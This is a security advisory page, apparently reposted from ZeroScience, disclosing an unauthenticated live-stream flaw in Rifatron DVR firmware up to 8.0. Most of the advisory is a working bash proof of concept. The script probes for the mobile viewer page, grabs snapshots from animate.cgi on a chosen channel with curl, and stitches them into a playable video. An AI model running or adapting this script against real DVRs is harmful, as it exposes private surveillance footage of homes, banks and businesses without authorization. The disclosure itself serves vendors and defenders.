Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure

2019.09.10
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/bash # # # Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure # # # Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd. # Product web page: http://www.rifatron.com # Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504) # 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2) # Firmware: <=8.0 (000143) # # # Summary: Rifatron with its roots in Seoul, Korea has been supplying and # servicing the security market as a leading CCTV/video surveillance security # system manufacturer, specializing in stand-alone digital video recorder since # 1998. We are known for marking the first standalone DVR with audio detection # and 480 frames per secone(fps) and have been focusing on highend products and # large projects in a variety applications and merket. These include government # and public services, banking and finance, hotels and entertatinment, retail # education, industrial and commercial sectors throughout Europe, Middle East, # the U.S. and Asia. Based on the accumulated know-how in the security industry, # Rifatron is trying its utmost for the technology development and customer # satisfaction to be the best security solution company in the world. # # Desc: The DVR suffers from an unauthenticated and unauthorized live stream # disclosure when animate.cgi script is called through Mobile Web Viewer module. # # Tested on: Embedded Linux # Boa/0.94.14rc21 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5532 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php # # # 03.09.2019 # #{PoC} # set -euo pipefail IFS=$'\n\t' if [ "$#" -ne 2 ]; then echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15 echo "Ex.: $0 10.9.8.7:65432 10" exit fi IP=$1 CHANNEL=$2 HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL" STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$STATUS" == "404" ]; then echo "Target not vulnerable!" exit fi echo "Collecting snapshots..." for x in {1..10}; do echo -ne $x curl "$HOST" -o sequence-$x.jpg -#; sleep 0.6 done echo -ne "\nDone." echo -ne "\nRendering video..." ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4 echo " done." echo -ne "\nRunning animation..." sleep 1 cvlc video.mp4 --verbose -1 -f vlc://quit # #{/PoC}


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top